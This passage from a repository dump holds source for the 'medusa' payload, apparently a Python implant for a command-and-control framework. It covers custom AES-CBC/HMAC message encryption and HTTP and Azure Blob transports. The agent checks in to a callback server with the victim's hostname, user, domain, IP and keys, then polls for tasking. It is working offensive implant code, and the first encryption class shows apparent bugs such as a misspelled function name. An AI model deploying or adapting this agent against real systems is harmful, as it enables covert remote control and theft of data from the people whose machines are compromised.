[key_columns[4*i : 4*(i+1)] for i in range(len(key_columns) // 4)]\n\n    def encrypt_block(self, plaintext):\n        assert len(plaintext) == 16\n        plain_state = bytes2amatrix(plaintext)\n        add_round_key(plain_state, self._key_matrices[0])\n        for i in range(1, self.n_rounds):\n            sub_bytes(plain_state)\n            shift_rows(plain_state)\n            mix_columns(plain_state)\n            add_round_key(plain_state, self._key_matrices[i])\n        sub_bytes(plain_state)\n        shift_rows(plain_state)\n        add_round_key(plain_state, self._key_matrices[-1])\n\n        return matrix2bytes(plain_state)\n\n    def decrypt_block(self, ciphertext):\n        assert len(ciphertext) == 16\n        cipher_state = bytes2matrix(ciphertext)\n        add_round_key(cipher_state, self._key_matrices[-1])\n        inv_shift_rows(cipher_state)\n        inv_sub_bytes(cipher_state)\n\n        for i in range(self.n_rounds - 1, 0, -1):\n            add_round_key(cipher_state, self._key_matrices[i])\n            inv_mix_columns(cipher_state)\n            inv_shift_rows(cipher_state)\n            inv_sub_bytes(cipher_state)\n        add_round_key(cipher_state, self._key_matrices[0])\n        return matrix2bytes(cipher_state)\n\n    def encrypt_cbc(self, plaintext, iv):\n        assert len(iv) == 16\n        plaintext = pad(plaintext)\n        blocks = []\n        previous = iv\n        for plaintext_block in split_blocks(plaintext):\n            block = self.encrypt_block(xor_bytes(plaintext_block, previous))\n            blocks.extend(block)\n            previous = block\n\n        return bytes(b''.join(blocks))\n\n    def decrypt_cbc(self, ciphertext, iv):\n        assert len(iv) == 16\n        blocks = []\n        previous = iv\n        for ciphertext_block in split_blocks(ciphertext):\n            blocks.extend(xor_bytes(previous, self.decrypt_block(ciphertext_block), True))\n            previous = ciphertext_block\n        return unpad(''.join(blocks))\n\nclass medusa:\n    def encrypt(self, data):\n        from hmac import new\n        import hashlib\n        if self.agent_config[\"enc_key\"][\"value\"] == \"aes256_hmac\" and len(data)>0:\n            key = base64.b64decode(self.agent_config[\"enc_key\"][\"enc_key\"])\n            iv = os.urandom(16)\n            ciphertext = AES(key).encrypt_cbc(data, iv)\n            hmac = new(key, iv + ciphertext, hashlib.sha256).digest()\n            return iv + ciphertext + hmac\n        else: return data\n\n    def decrypt(self, data):\n        from hmac import new, compare_digest\n        import hashlib\n        if self.agent_config[\"enc_key\"][\"value\"] == \"aes256_hmac\":\n            if len(data)>0:\n                key = base64.b64decode(self.agent_config[\"enc_key\"][\"dec_key\"])\n                uuid = data[:36]\n                iv = data[36:52]\n                ct = data[52:-32]\n                received_hmac = data[-32:]\n                hmac = new(key, iv + ct, hashlib.sha256).digest()\n                if compare_digest(hmac, received_hmac):\n                    return (uuid + AES(key).decrypt_cbc(ct, iv)).decode()\n                else: return \"\"\n            else: return \"\"\n        else: return data.decode()"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/base_agent/manual_crypto.py3",
    "content": "s_box = (\n    0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,\n    0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,\n    0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15,\n    0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75,\n    0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84,\n    0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF,\n    0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8,\n    0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,\n    0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,\n    0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,\n    0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,\n    0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,\n    0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,\n    0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E,\n    0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,\n    0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16,\n)\n\ninv_s_box = (\n    0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB,\n    0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB,\n    0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E,\n    0x08, 0x2E, 0xA1, 0x66, 0x28, 0xD9, 0x24, 0xB2, 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25,\n    0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92,\n    0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84,\n    0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06,\n    0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B,\n    0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73,\n    0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E,\n    0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B,\n    0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4,\n    0x1F, 0xDD, 0xA8, 0x33, 0x88, 0x07, 0xC7, 0x31, 0xB1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xEC, 0x5F,\n    0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, 0x2D, 0xE5, 0x7A, 0x9F, 0x93, 0xC9, 0x9C, 0xEF,\n    0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, 0xC8, 0xEB, 0xBB, 0x3C, 0x83, 0x53, 0x99, 0x61,\n    0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, 0xE1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0C, 0x7D,\n)\n\ndef sub_bytes(s):\n    for i in range(4): \n        for j in range(4):\n            s[i][j] = s_box[s[i][j]]\n\ndef inv_sub_bytes(s):\n    for i in range(4):\n        for j in range(4):\n            s[i][j] = inv_s_box[s[i][j]]\n\ndef shift_rows(s):\n    s[0][1], s[1][1], s[2][1], s[3][1] = s[1][1], s[2][1], s[3][1], s[0][1]\n    s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]\n    s[0][3], s[1][3], s[2][3], s[3][3] = s[3][3], s[0][3], s[1][3], s[2][3]\n\ndef inv_shift_rows(s):\n    s[0][1], s[1][1], s[2][1], s[3][1] = s[3][1], s[0][1], s[1][1], s[2][1]\n    s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]\n    s[0][3], s[1][3], s[2][3], s[3][3] = s[1][3], s[2][3], s[3][3], s[0][3]\n\ndef add_round_key(s, k):\n    for i in range(4):\n        for j in range(4):\n            s[i][j] ^= k[i][j]\n\nxtime = lambda a: (((a << 1) ^ 0x1B) & 0xFF) if (a & 0x80) else (a << 1)\n\ndef mix_single_column(a):\n    t = a[0] ^ a[1] ^ a[2] ^ a[3]\n    u = a[0]\n    a[0] ^= t ^ xtime(a[0] ^ a[1])\n    a[1] ^= t ^ xtime(a[1] ^ a[2])\n    a[2] ^= t ^ xtime(a[2] ^ a[3])\n    a[3] ^= t ^ xtime(a[3] ^ u)\n\ndef mix_columns(s):\n    for i in range(4): mix_single_column(s[i])\n\ndef inv_mix_columns(s):\n    for i in range(4):\n        u = xtime(xtime(s[i][0] ^ s[i][2]))\n        v = xtime(xtime(s[i][1] ^ s[i][3]))\n        s[i][0] ^= u\n        s[i][1] ^= v\n        s[i][2] ^= u\n        s[i][3] ^= v\n\n    mix_columns(s)\n\nr_con = (\n    0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,\n    0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A,\n    0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A,\n    0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39,\n)\n\ndef bytes2matrix(text):\n    return [list(text[i:i+4]) for i in range(0, len(text), 4)]\n\ndef matrix2bytes(matrix):\n    return bytes(sum(matrix, []))\n\ndef xor_bytes(a, b):\n    return bytes(i^j for i, j in zip(a, b))\n\ndef inc_bytes(a):\n    out = list(a)\n    for i in reversed(range(len(out))):\n        if out[i] == 0xFF:\n            out[i] = 0\n        else:\n            out[i] += 1\n            break\n    return bytes(out)\n\ndef pad(plaintext):\n    padding_len = 16 - (len(plaintext) % 16)\n    padding = bytes([padding_len] * padding_len)\n    return plaintext + padding\n\ndef unpad(plaintext):\n    padding_len = plaintext[-1]\n    assert padding_len > 0\n    message, padding = plaintext[:-padding_len], plaintext[-padding_len:]\n    assert all(p == padding_len for p in padding)\n    return message\n\ndef split_blocks(message, block_size=16, require_padding=True):\n        assert len(message) % block_size == 0 or not require_padding\n        return [message[i:i+16] for i in range(0, len(message), block_size)]\n\nclass AES:\n    rounds_by_key_size = {16: 10, 24: 12, 32: 14}\n    def __init__(self, master_key):\n        assert len(master_key) in AES.rounds_by_key_size\n        self.n_rounds = AES.rounds_by_key_size[len(master_key)]\n        self._key_matrices = self._expand_key(master_key)\n\n    def _expand_key(self, master_key):\n        key_columns = bytes2matrix(master_key)\n        iteration_size = len(master_key) // 4\n        columns_per_iteration = len(key_columns)\n        i = 1\n        while len(key_columns) < (self.n_rounds + 1) * 4:\n            word = list(key_columns[-1])\n            if len(key_columns) % iteration_size == 0:\n                word.append(word.pop(0))\n                word = [s_box[b] for b in word]\n                word[0] ^= r_con[i]\n                i += 1\n            elif len(master_key) == 32 and len(key_columns) % iteration_size == 4:\n                word = [s_box[b] for b in word]\n\n            word = xor_bytes(word, key_columns[-iteration_size])\n            key_columns.append(word)\n        return [key_columns[4*i : 4*(i+1)] for i in range(len(key_columns) // 4)]\n\n    def encrypt_block(self, plaintext):\n        assert len(plaintext) == 16\n        plain_state = bytes2matrix(plaintext)\n        add_round_key(plain_state, self._key_matrices[0])\n        for i in range(1, self.n_rounds):\n            sub_bytes(plain_state)\n            shift_rows(plain_state)\n            mix_columns(plain_state)\n            add_round_key(plain_state, self._key_matrices[i])\n        sub_bytes(plain_state)\n        shift_rows(plain_state)\n        add_round_key(plain_state, self._key_matrices[-1])\n\n        return matrix2bytes(plain_state)\n\n    def decrypt_block(self, ciphertext):\n        assert len(ciphertext) == 16\n        cipher_state = bytes2matrix(ciphertext)\n        add_round_key(cipher_state, self._key_matrices[-1])\n        inv_shift_rows(cipher_state)\n        inv_sub_bytes(cipher_state)\n\n        for i in range(self.n_rounds - 1, 0, -1):\n            add_round_key(cipher_state, self._key_matrices[i])\n            inv_mix_columns(cipher_state)\n            inv_shift_rows(cipher_state)\n            inv_sub_bytes(cipher_state)\n        add_round_key(cipher_state, self._key_matrices[0])\n        return matrix2bytes(cipher_state)\n\n    def encrypt_cbc(self, plaintext, iv):\n        assert len(iv) == 16\n        plaintext = pad(plaintext)\n        blocks = []\n        previous = iv\n        for plaintext_block in split_blocks(plaintext):\n            block = self.encrypt_block(xor_bytes(plaintext_block, previous))\n            blocks.append(block)\n            previous = block\n        return b''.join(blocks)\n\n    def decrypt_cbc(self, ciphertext, iv):\n        assert len(iv) == 16\n        blocks = []\n        previous = iv\n        for ciphertext_block in split_blocks(ciphertext):\n            blocks.append(xor_bytes(previous, self.decrypt_block(ciphertext_block)))\n            previous = ciphertext_block\n        return unpad(b''.join(blocks))\n\n\nclass medusa:\n    def encrypt(self, data):\n        from hmac import new\n        if self.agent_config[\"enc_key\"][\"value\"] == \"aes256_hmac\" and len(data)>0:\n            key = base64.b64decode(self.agent_config[\"enc_key\"][\"enc_key\"])\n            iv = os.urandom(16)\n            ciphertext = AES(key).encrypt_cbc(data, iv)\n            hmac = new(key, iv + ciphertext, 'sha256').digest()\n            return iv + ciphertext + hmac\n        else:\n            return data\n\n    def decrypt(self, data):\n        from hmac import new, compare_digest\n\n        if self.agent_config[\"enc_key\"][\"value\"] == \"aes256_hmac\":\n            if len(data)>0:\n                key = base64.b64decode(self.agent_config[\"enc_key\"][\"dec_key\"])\n                uuid = data[:36]\n                iv = data[36:52]\n                ct = data[52:-32]\n                received_hmac = data[-32:]\n                hmac = new(key, iv + ct, 'sha256').digest()\n                if compare_digest(hmac, received_hmac):\n                    return (uuid + AES(key).decrypt_cbc(ct, iv)).decode()\n                else: return \"\"\n            else: return \"\"\n        else: return data.decode()\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/base_agent/transport_azure_blob.py2",
    "content": "### IMPORTS ###\nimport urllib2\nimport uuid\n\n### CLASS_FIELDS ###\n    blob_endpoint = \"BLOB_ENDPOINT_PLACEHOLDER\"\n    container_name = \"CONTAINER_NAME_PLACEHOLDER\"\n    sas_token = \"CONTAINER_SAS_PLACEHOLDER\"\n    gcontext = None\n#CERTSKIP\n\n### FUNCTIONS ###\n    def get_blob_url(self, blob_path):\n        return \"{}/{}/{}?{}\".format(self.blob_endpoint, self.container_name, blob_path, self.sas_token)\n\n    def put_blob(self, blob_path, data):\n        url = self.get_blob_url(blob_path)\n        try:\n            req = urllib2.Request(url, data=data)\n            req.get_method = lambda: \"PUT\"\n            req.add_header(\"x-ms-blob-type\", \"BlockBlob\")\n            req.add_header(\"Content-Type\", \"application/octet-stream\")\n            req.add_header(\"Content-Length\", str(len(data)))\n            try:\n                resp = urllib2.urlopen(req, context=self.gcontext, timeout=30)\n            except TypeError:\n                resp = urllib2.urlopen(req, timeout=30)\n            try:\n                return resp.getcode() in (200, 201)\n            finally:\n                try:\n                    resp.close()\n                except Exception:\n                    pass\n        except Exception:\n            return False\n\n    def delete_blob(self, blob_path):\n        url = self.get_blob_url(blob_path)\n        try:\n            req = urllib2.Request(url)\n            req.get_method = lambda: \"DELETE\"\n            req.add_header(\"x-ms-blob-type\", \"BlockBlob\")\n            req.add_header(\"Content-Type\", \"application/octet-stream\")\n\n            try:\n                resp = urllib2.urlopen(req, context=self.gcontext, timeout=30)\n            except TypeError:\n                resp = urllib2.urlopen(req, timeout=30)\n            try:\n                return resp.getcode() in (200, 201, 202, 204)\n            finally:\n                try:\n                    resp.close()\n                except Exception:\n                    pass\n        except Exception:\n            return False\n\n    def get_blob(self, blob_path):\n        url = self.get_blob_url(blob_path)\n        try:\n            req = urllib2.Request(url)\n            try:\n                resp = urllib2.urlopen(req, context=self.gcontext, timeout=30)\n            except TypeError:\n                resp = urllib2.urlopen(req, timeout=30)\n            try:\n                return resp.read()\n            finally:\n                resp.close()\n        except urllib2.HTTPError as e:\n            if e.code == 404:\n                return b\"\"\n            return b\"\"\n        except Exception:\n            return b\"\"\n\n    def postMessageAndRetrieveResponseBlob(self, data):\n        formatted_data = self.formatMessage(data)\n        message_id = uuid.uuid4()\n        self.put_blob(\"ats/{}.blob\".format(message_id), formatted_data)\n        response = b\"\"\n        while response == b\"\":\n            self.agentSleep()\n            response = self.get_blob(\"sta/{}.blob\".format(message_id))\n        self.delete_blob(\"sta/{}.blob\".format(message_id))\n        decoded_response = base64.b64decode(response)\n        return self.formatResponse(self.decrypt(decoded_response))\n\n    def postMessageAndRetrieveResponse(self, data):\n        return self.postMessageAndRetrieveResponseBlob(data)\n\n    def getMessageAndRetrieveResponse(self, data):\n        return self.postMessageAndRetrieveResponseBlob(data)\n\n    def checkIn(self):\n        hostname = socket.gethostname()\n        ip = ''\n        if hostname and len(hostname) > 0:\n            try:\n                ip = socket.gethostbyname(hostname)\n            except:\n                pass\n\n        data = {\n            \"action\": \"checkin\",\n            \"ip\": ip,\n            \"os\": self.getOSVersion(),\n            \"user\": self.getUsername(),\n            \"host\": hostname,\n            \"domain\": socket.getfqdn(),\n            \"pid\": os.getpid(),\n            \"uuid\": self.agent_config[\"PayloadUUID\"],\n            \"architecture\": \"x64\" if sys.maxsize > 2**32 else \"x86\",\n            \"encryption_key\": self.agent_config[\"enc_key\"][\"enc_key\"],\n            \"decryption_key\": self.agent_config[\"enc_key\"][\"dec_key\"]\n        }\n        response_data = self.postMessageAndRetrieveResponse(data)\n        if(\"status\" in response_data):\n            UUID = response_data[\"id\"]\n            self.agent_config[\"UUID\"] = UUID\n            return True\n        else: return False\n\n    def makeRequest(self, data, method='GET'):\n        hdrs = {}\n        for header in self.agent_config[\"Headers\"]:\n            hdrs[header] = self.agent_config[\"Headers\"][header]\n        if method == 'GET':\n            req = urllib2.Request(self.agent_config[\"Server\"] + \":\" + self.agent_config[\"Port\"] + self.agent_config[\"GetURI\"] + \"?\" + self.agent_config[\"GetParam\"] + \"=\" + data.decode(), None, hdrs)\n        else:\n            req = urllib2.Request(self.agent_config[\"Server\"] + \":\" + self.agent_config[\"Port\"] + self.agent_config[\"PostURI\"], data, hdrs)\n\n        if self.agent_config[\"ProxyHost\"] and self.agent_config[\"ProxyPort\"]:\n            tls = \"https\" if self.agent_config[\"ProxyHost\"][0:5] == \"https\" else \"http\"\n            handler = urllib2.HTTPSHandler if tls else urllib2.HTTPHandler\n            if self.agent_config[\"ProxyUser\"] and self.agent_config[\"ProxyPass\"]:\n                proxy = urllib2.ProxyHandler({\n                    \"{}\".format(tls): '{}://{}:{}@{}:{}'.format(tls, self.agent_config[\"ProxyUser\"], self.agent_config[\"ProxyPass\"], \\\n                                                                self.agent_config[\"ProxyHost\"].replace(tls+\"://\", \"\"), self.agent_config[\"ProxyPort\"])\n                })\n                auth = urllib2.HTTPBasicAuthHandler()\n                opener = urllib2.build_opener(proxy, auth, handler)\n            else:\n                proxy = urllib2.ProxyHandler({\n                    \"{}\".format(tls): '{}://{}:{}'.format(tls, self.agent_config[\"ProxyHost\"].replace(tls+\"://\", \"\"), self.agent_config[\"ProxyPort\"])\n                })\n                opener = urllib2.build_opener(proxy, handler)\n            urllib2.install_opener(opener)\n        try:\n            try:\n                response = urllib2.urlopen(req, context=self.gcontext, timeout=30)\n            except TypeError:\n                response = urllib2.urlopen(req, timeout=30)\n            out = base64.b64decode(response.read())\n            response.close()\n            return out\n        except: return \"\"\n\n### CONFIG ###\n            \"Headers\": HEADER_PLACEHOLDER,\n            \"Sleep\": int(\"CALLBACK_INTERVAL_PLACEHOLDER\"),\n            \"Jitter\": int(\"CALLBACK_JITTER_PLACEHOLDER\"),\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/base_agent/transport_azure_blob.py3",
    "content": "### IMPORTS ###\nimport urllib.request\nimport uuid\n\n### CLASS_FIELDS ###\n    blob_endpoint = \"BLOB_ENDPOINT_PLACEHOLDER\"\n    container_name = \"CONTAINER_NAME_PLACEHOLDER\"\n    sas_token = \"CONTAINER_SAS_PLACEHOLDER\"\n    gcontext = None\n#CERTSKIP\n\n### FUNCTIONS ###\n    def get_blob_url(self, blob_path: str) -> str:\n        return f\"{self.blob_endpoint}/{self.container_name}/{blob_path}?{self.sas_token}\"\n\n    def put_blob(self, blob_path: str, data: bytes) -> bool:\n        url = self.get_blob_url(blob_path)\n        try:\n            req = urllib.request.Request(\n                url,\n                data=data,\n                method=\"PUT\",\n                headers={\n                    \"x-ms-blob-type\": \"BlockBlob\",\n                    \"Content-Type\": \"application/octet-stream\",\n                    \"Content-Length\": str(len(data)),\n                }\n            )\n            with urllib.request.urlopen(req, context=self.gcontext, timeout=30) as resp:\n                return resp.status in (200, 201)\n        except Exception:\n            return False\n\n    def delete_blob(self, blob_path: str) -> bool:\n        url = self.get_blob_url(blob_path)\n        try:\n            req = urllib.request.Request(\n                url,\n                method=\"DELETE\",\n                headers={\n                    \"x-ms-blob-type\": \"BlockBlob\",\n                    \"Content-Type\": \"application/octet-stream\",\n                }\n            )\n            with urllib.request.urlopen(req, context=self.gcontext, timeout=30) as resp:\n                return resp.status in (200, 201, 202, 204)\n        except Exception:\n            return False\n\n    def get_blob(self, blob_path: str) -> bytes:\n        url = self.get_blob_url(blob_path)\n        try:\n            req = urllib.request.Request(url, method=\"GET\")\n            with urllib.request.urlopen(req, context=self.gcontext, timeout=30) as resp:\n                return resp.read()\n        except urllib.request.HTTPError as e:\n            if e.code == 404:\n                return b\"\"\n            return b\"\"\n        except Exception:\n            return b\"\"\n\n    def postMessageAndRetrieveResponseBlob(self, data):\n        formatted_data = self.formatMessage(data)\n        message_id = uuid.uuid4()\n        self.put_blob(f\"ats/{message_id}.blob\", formatted_data)\n        response = b\"\"\n        while response == b\"\":\n            self.agentSleep()\n            response = self.get_blob(f\"sta/{message_id}.blob\")\n        self.delete_blob(f\"sta/{message_id}.blob\")\n        decoded_response = base64.b64decode(response)\n        return self.formatResponse(self.decrypt(decoded_response))\n\n    def postMessageAndRetrieveResponse(self, data):\n        return self.postMessageAndRetrieveResponseBlob(data)\n\n    def getMessageAndRetrieveResponse(self, data):\n        return self.postMessageAndRetrieveResponseBlob(data)\n\n    def checkIn(self):\n        hostname = socket.gethostname()\n        ip = ''\n        if hostname and len(hostname) > 0:\n            try:\n                ip = socket.gethostbyname(hostname)\n            except:\n                pass\n\n        data = {\n            \"action\": \"checkin\",\n            \"ip\": ip,\n            \"os\": self.getOSVersion(),\n            \"user\": self.getUsername(),\n            \"host\": hostname,\n            \"domain\": socket.getfqdn(),\n            \"pid\": os.getpid(),\n            \"uuid\": self.agent_config[\"PayloadUUID\"],\n            \"architecture\": \"x64\" if sys.maxsize > 2**32 else \"x86\",\n            \"encryption_key\": self.agent_config[\"enc_key\"][\"enc_key\"],\n            \"decryption_key\": self.agent_config[\"enc_key\"][\"dec_key\"]\n        }\n        response_data = self.postMessageAndRetrieveResponse(data)\n        if(\"status\" in response_data):\n            UUID = response_data[\"id\"]\n            self.agent_config[\"UUID\"] = UUID\n            return True\n        else: return False\n\n    def makeRequest(self, data, method='GET'):\n        hdrs = {}\n        for header in self.agent_config[\"Headers\"]:\n            hdrs[header] = self.agent_config[\"Headers\"][header]\n        if method == 'GET':\n            req = urllib.request.Request(self.agent_config[\"Server\"] + \":\" + self.agent_config[\"Port\"] + self.agent_config[\"GetURI\"] + \"?\" + self.agent_config[\"GetParam\"] + \"=\" + data.decode(), None, hdrs)\n        else:\n            req = urllib.request.Request(self.agent_config[\"Server\"] + \":\" + self.agent_config[\"Port\"] + self.agent_config[\"PostURI\"], data, hdrs)\n\n        if self.agent_config[\"ProxyHost\"] and self.agent_config[\"ProxyPort\"]:\n            tls = \"https\" if self.agent_config[\"ProxyHost\"][0:5] == \"https\" else \"http\"\n            handler = urllib.request.HTTPSHandler if tls else urllib.request.HTTPHandler\n            if self.agent_config[\"ProxyUser\"] and self.agent_config[\"ProxyPass\"]:\n                proxy = urllib.request.ProxyHandler({\n                    \"{}\".format(tls): '{}://{}:{}@{}:{}'.format(tls, self.agent_config[\"ProxyUser\"], self.agent_config[\"ProxyPass\"], \\\n                                                                self.agent_config[\"ProxyHost\"].replace(tls+\"://\", \"\"), self.agent_config[\"ProxyPort\"])\n                })\n                auth = urllib.request.HTTPBasicAuthHandler()\n                opener = urllib.request.build_opener(proxy, auth, handler)\n            else:\n                proxy = urllib.request.ProxyHandler({\n                    \"{}\".format(tls): '{}://{}:{}'.format(tls, self.agent_config[\"ProxyHost\"].replace(tls+\"://\", \"\"), self.agent_config[\"ProxyPort\"])\n                })\n                opener = urllib.request.build_opener(proxy, handler)\n            urllib.request.install_opener(opener)\n        try:\n            with urllib.request.urlopen(req, context=self.gcontext, timeout=30) as response:\n                out = base64.b64decode(response.read())\n                response.close()\n                return out\n        except: return \"\"\n\n### CONFIG ###\n            \"Headers\": HEADER_PLACEHOLDER,\n            \"Sleep\": int(\"CALLBACK_INTERVAL_PLACEHOLDER\"),\n            \"Jitter\": int(\"CALLBACK_JITTER_PLACEHOLDER\"),\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/base_agent/transport_http.py2",
    "content": "### IMPORTS ###\nimport urllib2\n\n### CLASS_FIELDS ###\n\n### FUNCTIONS ###\n    def postMessageAndRetrieveResponse(self, data):\n        return self.formatResponse(self.decrypt(self.makeRequest(self.formatMessage(data), 'POST')))\n\n    def getMessageAndRetrieveResponse(self, data):\n        return self.formatResponse(self.decrypt(self.makeRequest(self.formatMessage(data, True))))\n\n    def checkIn(self):\n        hostname = socket.gethostname()\n        ip = ''\n        if hostname and len(hostname) > 0:\n            try:\n                ip = socket.gethostbyname(hostname)\n            except:\n                pass\n\n        data = {\n            \"action\": \"checkin\",\n            \"ip\": ip,\n            \"os\": self.getOSVersion(),\n            \"user\": self.getUsername(),\n            \"host\": hostname,\n            \"domain\": socket.getfqdn(),\n            \"pid\": os.getpid(),\n            \"uuid\": self.agent_config[\"PayloadUUID\"],\n            \"architecture\": \"x64\" if sys.maxsize > 2**32 else \"x86\",\n            \"encryption_key\": self.agent_config[\"enc_key\"][\"enc_key\"],\n            \"decryption_key\": self.agent_config[\"enc_key\"][\"dec_key\"]\n        }\n        response_data = self.postMessageAndRetrieveResponse(data)\n        if(\"status\" in response_data):\n            UUID = response_data[\"id\"]\n            self.agent_config[\"UUID\"] = UUID\n            return True\n        else: return False\n\n    def makeRequest(self, data, method='GET'):\n        hdrs = {}\n        for header in self.agent_config[\"Headers\"]:\n            hdrs[header] = self.agent_config[\"Headers\"][header]\n        if method == 'GET':\n            req = urllib2.Request(self.agent_config[\"Server\"] + \":\" + self.agent_config[\"Port\"] + self.agent_config[\"GetURI\"] + \"?\" + self.agent_config[\"GetParam\"] + \"=\" + data.decode(), None, hdrs)\n        else:\n            req = urllib2.Request(self.agent_config[\"Server\"] + \":\" + self.agent_config[\"Port\"] + self.agent_config[\"PostURI\"], data, hdrs)\n        #CERTSKIP\n        if self.agent_config[\"ProxyHost\"] and self.agent_config[\"ProxyPort\"]:\n            tls = \"https\" if self.agent_config[\"ProxyHost\"][0:5] == \"https\" else \"http\"\n            handler = urllib2.HTTPSHandler if tls else urllib2.HTTPHandler\n            if self.agent_config[\"ProxyUser\"] and self.agent_config[\"ProxyPass\"]:\n                proxy = urllib2.ProxyHandler({\n                    \"{}\".format(tls): '{}://{}:{}@{}:{}'.format(tls, self.agent_config[\"ProxyUser\"], self.agent_config[\"ProxyPass\"], \\\n                        self.agent_config[\"ProxyHost\"].replace(tls+\"://\", \"\"), self.agent_config[\"ProxyPort\"])\n                })\n                auth = urllib2.HTTPBasicAuthHandler()\n                opener = urllib2.build_opener(proxy, auth, handler)\n            else:\n                proxy = urllib2.ProxyHandler({\n                    \"{}\".format(tls): '{}://{}:{}'.format(tls, self.agent_config[\"ProxyHost\"].replace(tls+\"://\", \"\"), self.agent_config[\"ProxyPort\"])\n                })\n                opener = urllib2.build_opener(proxy, handler)\n            urllib2.install_opener(opener)\n        try:\n            response = urllib2.urlopen(req)\n            out = base64.b64decode(response.read())\n            response.close()\n            return out\n        except: return \"\"\n\n### CONFIG ###\n            \"Server\": \"callback_host\",\n            \"Port\": \"callback_port\",\n            \"PostURI\": \"/post_uri\",\n            \"Headers\": 